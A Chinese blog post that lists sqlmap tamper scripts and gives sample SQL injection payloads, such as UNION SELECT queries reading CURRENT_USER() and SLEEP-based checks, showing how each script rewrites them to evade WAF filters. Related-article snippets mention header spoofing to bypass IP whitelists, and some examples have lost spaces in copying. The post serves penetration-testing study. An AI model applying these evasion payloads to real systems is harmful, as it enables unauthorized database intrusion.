Sqlmap————7、Tamper脚本绕WAF

最新推荐文章于 2024-07-30 00:00:00 发布
最新推荐文章于 2024-07-30 00:00:00 发布
阅读量878 收藏 5
点赞数
分类专栏: # SQLmap 【渗透工具】

0x01 start

脚本名:apostrophemask.py

作用:用utf8代替引号
Example: ("1 AND '1'='1") '1 AND%EF%BC%871%EF%BC%87=%EF%BC%871'
Tested against: all
脚本名:equaltolike.py 
作用:like 代替等号
Example:   * Input: SELECT * FROM usersWHERE id=1   * Output: SELECT * FROM users WHERE id LIKE 1
脚本名:space2dash.py 
作用:绕过过滤‘=’替换空格字符(”),(’–‘)后跟一个破折号注释,一个随机字符串和一个新行(’ n’)
1 Example: ('1 AND 9227=9227')'1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227'
Tested against: * MSSQL * SQLite
脚本名:greatest.py 
作用:绕过过滤’>’ ,用GREATEST替换大于号。
Example: ('1 AND A > B') '1 ANDGREATEST(A,B+1)=A' Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g* PostgreSQL 8.3, 8.4, 9.0
脚本名:space2hash.py 
作用:空格替换为#号随机字符串以及换行符
Example:   * Input: 1 AND 9227=9227 *Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement:
MySQL Tested against:
MySQL 4.0, 5.0

脚本名:apostrophenullencode.py

作用:绕过过滤双引号,替换字符和双引号。

Example: tamper("1 AND'1'='1") '1 AND %00%271%00%27=%00%271'
Tested against:
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
脚本名:halfversionedmorekeywords.py 
作用:当数据库为mysql时绕过防火墙,每个关键字之前添加mysql版本评论
 Example:   ("value'UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() ASCHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND'QDWa'='QDWa"
Requirement:
MySQL < 5.1
Tested against:
MySQL 4.0.18, 5.0.22
脚本名:space2morehash.py 
作用:空格替换为 #号 以及更多随机字符串 换行符
Example:   * Input: 1 AND9227=9227   * Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
Requirement: * MySQL >= 5.1.13 Tested
against: * MySQL 5.1.41
脚本名:appendnullbyte.py 
作用:在有效负荷结束位置加载零字节字符编码
Example: ('1 AND 1=1') '1 AND 1=1%00'
Requirement:
Microsoft Access
脚本名:ifnull2ifisnull.py 
作用:绕过对 IFNULL 过滤。 替换类似’IFNULL(A, B)’为’IF(ISNULL(A), B, A)’
Example:   ('IFNULL(1, 2)')'IF(ISNULL(1),2,1)'
Requirement:
MySQL
SQLite (possibly)
SAP MaxDB (possibly)
Tested against:
MySQL 5.0 and 5.5
脚本名:space2 mssqlblank.py(mssql) 
作用:空格替换为其它空符号

Example: * Input: SELECT id FROM users * Output:SELECT%08id%02FROM%0Fusers

Requirement: * Microsoft SQL Server Tested against: *Microsoft SQL Server 2000 * Microsoft SQL Server 2005
ASCII table: 
案例一:http://www.2cto.com/Article/201311/259652.html
脚本名:base64encode.py 
作用:用base64编码替换 Example: ("1' AND SLEEP(5)#")'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all
脚本名:space2mssqlhash.py 
作用:替换空格

Example: ('1 AND 9227=9227')'1%23%0AAND%23%0A9227=9227' Requirement: * MSSQL * MySQL

脚本名:modsecurityversioned.py

作用:过滤空格,包含完整的查询版本注释
Example: ('1 AND 2>1--') '1/*!30874AND 2>1*/--'
Requirement: * MySQL
Tested against:
MySQL 5.0
脚本名:space2mysqlblank.py 
作用:空格替换其它空白符号(mysql)
Example:   * Input: SELECT idFROM users   * Output: SELECT%0Bid%0BFROM%A0users
Requirement:
MySQL
Tested against:
MySQL 5.1
脚本名:between.py 
作用:用between替换大于号(>)
Example: ('1 AND A > B--') '1 AND ANOT BETWEEN 0 AND B--'
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4,9.0
脚本名:space2mysqldash.py 
作用:替换空格字符(”)(’ – ‘)后跟一个破折号注释一个新行(’ n’)
注:之前有个mssql的 这个是mysql的
Example: ('1 AND 9227=9227')'1--%0AAND--%0A9227=9227'
Requirement:
MySQL
MSSQL
脚本名:multiplespaces.py 
作用:围绕SQL关键字添加多个空格

Example: ('1 UNION SELECT foobar') '1UNION SELECT foobar'

Tested against: all
脚本名:space2plus.py 
作用:用+替换空格

Example: ('SELECT id FROM users')'SELECT+id+FROM+users' Tested against: all
脚本名:bluecoat.py 
作用:代替空格字符后与一个有效的随机空白字符的SQL语句。 然后替换=为like

Example: ('SELECT id FROM users whereid = 1') 'SELECT%09id FROM users where id LIKE 1'

Tested against:

MySQL 5.1, SGOS
脚本名:nonrecursivereplacement.py 
双重查询语句。取代predefinedSQL关键字with表示 suitable for替代(例如 .replace(“SELECT”、””)) filters

Example: ('1 UNION SELECT 2--') '1UNIOUNIONN SELESELECTCT 2--' Tested against: all
脚本名:space2randomblank.py 
作用:代替空格字符(“”)从一个随机的空白字符可选字符的有效集

Example: ('SELECT id FROM users')'SELECT%0Did%0DFROM%0Ausers'

Tested against: all

脚本名:sp_password.py

作用:追加sp_password’从DBMS日志的自动模糊处理的有效载荷的末尾

Example: ('1 AND 9227=9227-- ') '1 AND9227=9227-- sp\_password' Requirement: * MSSQL
脚本名:chardoubleencode.py 
作用: 双url编码(不处理以编码的)

Example:   * Input: SELECT FIELDFROM%20TABLE   * Output:%2553%2545%254c%2545%2543%2554%2520%2546%2549%2545%254c%2544%2520%2546%2552%254f%254d%2520%2554%2541%2542%254c%2545
脚本名:unionalltounion.py 
作用:替换UNION ALLSELECT UNION SELECT

Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'

Requirement: all
脚本名:charencode.py 
作用:url编码

Example:   * Input: SELECT FIELDFROM%20TABLE   * Output: %53%45%4c%45%43%54%20%46%49%45%4c%44%20%46%52%4f%4d%20%54%41%42%4c%45
tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0

脚本名:randomcase.py

作用:随机大小写 Example:

Input: INSERT
Output: InsERt
Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
脚本名:unmagicquotes.py 
作用:宽字符绕过 GPCaddslashes

Example:   * Input: 1′ AND1=1   * Output: 1%bf%27 AND 1=1–%20
脚本名:randomcomments.py 
作用:用/**/分割sql关键字

Example:   ‘INSERT’becomes ‘IN//S//ERT’
脚本名:charunicodeencode.py 
作用:字符串 unicode 编码

Example:   * Input: SELECTFIELD%20FROM TABLE   * Output:%u0053%u0045%u004c%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004c%u0044%u0020%u0046%u0052%u004f%u004d%u0020%u0054%u0041%u0042%u004c%u0045′

Requirement:

ASP
ASP.NET
Tested against:
Microsoft SQL Server 2000
Microsoft SQL Server 2005
MySQL 5.1.56
PostgreSQL 9.0.3
脚本名:securesphere.py 
作用:追加特制的字符串

Example: ('1 AND 1=1') "1 AND 1=1and '0having'='0having'"

Tested against: all
脚本名:versionedmorekeywords.py 

作用:注释绕过

Example:   * Input: 1 UNION ALLSELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() ASCHAR),CHAR(32)),CHAR(58,115,114,121,58))#   * Output:1/*!UNION**!ALL**!SELECT**!NULL*/,/*!NULL*/,/*!CONCAT*/(/*!CHAR*/(58,122,114,115,58),/*!IFNULL*/(CAST(/*!CURRENT_USER*/()/*!AS**!CHAR*/),/*!CHAR*/(32)),/*!CHAR*/(58,115,114,121,58))#

Requirement:

MySQL >= 5.1.13
脚本名:space2comment.py 
作用:Replacesspace character (‘ ‘) with comments ‘/**/’

Example:   * Input: SELECT idFROM users   * Output: SELECT//id//FROM/**/users

Tested against:
Microsoft SQL Server 2005
MySQL 4, 5.0 and 5.5
Oracle 10g
PostgreSQL 8.3, 8.4, 9.0
脚本名:halfversionedmorekeywords.py 
作用:关键字前加注释

Example:   * Input: value’UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() ASCHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND ‘QDWa’='QDWa  * Output: value’/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),NULL, NULL#/*!0AND ‘QDWa’='QDWa

Requirement:

MySQL < 5.1

Tested against:

MySQL 4.0.18, 5.0.22
FLy_鹏程万里
关注
专栏目录
sqlmap tamper脚本编写
m0_56578216的博客
09-22 516
SQLMap 是一款SQL注入神器,可以通过tamper 对注入payload 进行编码和变形,以达到过某些限制的目的。但是有些时候,SQLMap 自带的Tamper 脚本并不是特别好用,需要根据实际情况定制Tamper 脚本sqlmap的编写语言也是python,tamper脚本能增强sqlmap的功能,达到过检测的目的。
sqlmapwaf
qi_SJQ_的博客
11-12 9763
白名单: 方式一:IP白奖单 从网络层获取的ip,这种一般伪造不来,如果是获取客户端的IP,这样就可能存在伪造IP过的情况。 测试方法:修改http的header来bypass waf x-forwarded-for x-remote-IP x-originating-IP x-remote-addr x-Real-ip   方式二:静态资源 特定的静态资源后缀请求,常见的静态文件(.js .jpg .swf .css等等),类似白名单机制,waf为了检测效率,不去检测这样一些静态文件名...
进阶的sqlmap用法(参数讲解)
热门推荐
0yst3r ‘s blog
09-21 1万+
进阶的sqlmap用法 参数讲解 1>探测等级: --level 5 --level 5 指的是需要执行的测试等级 一共有5个等级(1-5) 不加 level 时,默认是1 5级包含的payload最多,会自动破解出cookie、XFF等头部注入,相对应他的速度也比较慢。 level=2 http cookie会测试 level=3 http...
如何使用SQLMapWAF
cnbird's blog
03-07 4430
WAF(web应用防火墙)逐渐成为安全解决方案的标配之一。正因为有了它,许多公司甚至已经不在意web应用的漏洞。遗憾的是,并不是所有的waf都是不可过的!本文将向大家讲述,如何使用注入神器SQLMapWAFs/IDSs。 svn下载最新版本的sqlmap svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap sqlmap-dev
sqlmap从注入到脚本制作【超全】
最新发布
2301_80064376的博客
07-30 678
SQLMap 是一个开源的渗透测试工具,专门用于自动化检测和利用 SQL 注入漏洞。它具备强大的功能和灵活的使用方式,适合安全研究人员和渗透测试人员使用。
SQLmapwaf脚本详解
一杯咖啡的渗透记忆
11-15 1976
使用方法--tamper xxx.py apostrophemask.py 用UTF-8全角字符替换单引号字符 apostrophenullencode.py 用非法双字节unicode字符替换单引号字符 appendnullbyte.py 在payload末尾添加空字符编码 base64encode.py 对给定的payload全部字符使用Base64编码 bet...
SQLMAPWAF小技巧
永远是少年
08-26 2365
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLMAPWAF小技巧。 一、SQLMAP伪造IP白名单 二、SQLMAP伪造静态资源 三、SQLMAP伪造URL白名单 四、SQLMAP伪造User-Agent
sqlmap过云锁waf
qq_50854662的博客
01-05 2850
sqlmap过云锁waf
sqlmap-tamper脚本分类
09-22
web渗透,sqlmap脚本分类。渗透
1、Sqlmap Tamper脚本编写介绍-01
09-15
Sqlmap Tamper脚本是对Sqlmap工具的扩展,主要功能是对原本的payload进行特定的更改以WAFTamper脚本结构主要包括三个部分:Tamper脚本结构介绍、Tamper函数介绍和dependencies函数介绍。 Tamper脚本结构介绍 ...
sqlmap编写tamper脚本
糖小喵
05-02 1598
前言 sqlmap是一个开源渗透测试工具,它可以自动检测和利用SQL注入漏洞并接管数据库服务器的过程。它具有强大的检测引擎,针对最终渗透测试仪的众多利基功能,以及广泛的开关,包括数据库指纹识别,从数据库中获取数据,访问底层文件系统以及通过外出在操作系统上执行命令,带内连接。sqlmap是一个开源渗透测试工具,它可以自动检测和利用SQL注入漏洞并接管数据库服务器的过程。它具有强大的检测引擎,针对最...
sqlmap自动化脚本
03-27
自己用批处理写的一个sqlmap脚本,不用看手册输命令行了 大部分参数均可设置,也可以自己输入其他参数
sqlmap的一些脚本的使用,过滤的神器
11-26
sql注入神奇,搭配各种脚本,花式过滤,懂的人自然懂,哈哈,欢迎下载
sqlmap脚本
03-08
sqlmap过安全狗脚本 源自github sqlmap过安全狗脚本 来源自github
定制SQLmapWAF
weixin_58954236的博客
09-23 1103
以sqli-lab第26关为例输入?id=1’ --+,报错字符型注入考虑闭合问题,输入?id=1’ and '1,但是回显中and和空格消失了,可知and和空格被过滤了因为and和or被过滤考虑使用双写过手段,空格使用其他字符进行代替例如%0a或%a0使用SQLmap扫描,结果无SQL注入漏洞可是明明手动测试存在SQL注入漏洞但是SQLmap竟然没有扫描出来,是因为SQLmap在进行注入的时候没有合适的过手法,被过滤掉了,那么就需要我们对SQLmap发送的payload进行编码。
Sqlmap 识别 WAF
andiao1218的博客
09-11 2566
命令: ┌─[root@sch01ar]─[~] └──╼ #sqlmap -u "http://www.sch01ar.com/" --identify-waf --batch 运行结果 如果使用的 WAF 没有什么特征,Sqlmap 识别出来的类型会是 Generic (Unknown) 在 Sqlmap 的安装目录下的 waf 目录中存放着相关的 waf ...
WEB漏洞-SQL注入之sqlmapwaf
xhscxj的博客
01-18 2865
静态资源 特定的静态资源后缀请求,常见的静态文件如(.js,.css,.jpg,.txt等),类似与白名单机制,waf为了检验的效率,不会去检验这样一些静态后缀名的请求 在网站目录后面加上x.txt,网站返回的数据不会受影响,这样waf就有可能不会去检查后面的参数,从而过。 爬虫白名单 当你去用工具扫描网站时访问的次数太频繁,如果网站waf设有流量资源防护,就会把你的ip列入黑名单。 但是为什么百度,谷歌等浏览器也属于爬虫,他们请求的时候不会被禁止访问 因为网站的waf设置了爬虫白名单,当它识别到use
WEB 漏洞-SQLMAP WAF
weixin_65409651的博客
06-20 261
【代码】WEB 漏洞-SQLMAP WAF
SQLMAP渗透笔记之WAF防火墙
Birdman-one的博客
12-26 1万+
---------------------------------------------------------------------------------------------                 SQLMAP渗透笔记之WAF防火墙 ------------------------------------------------------------
SQLMap tamper脚本WAF与渗透测试指南
"SQLMapTamper文档详细介绍了如何使用SQLMaptamper脚本过Web应用程序的敏感字符过滤和WAF规则,以便进行渗透测试。文档涵盖了tamper脚本的作用、用法以及针对不同数据库类型的tamper脚本选择。" 在网络安全...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值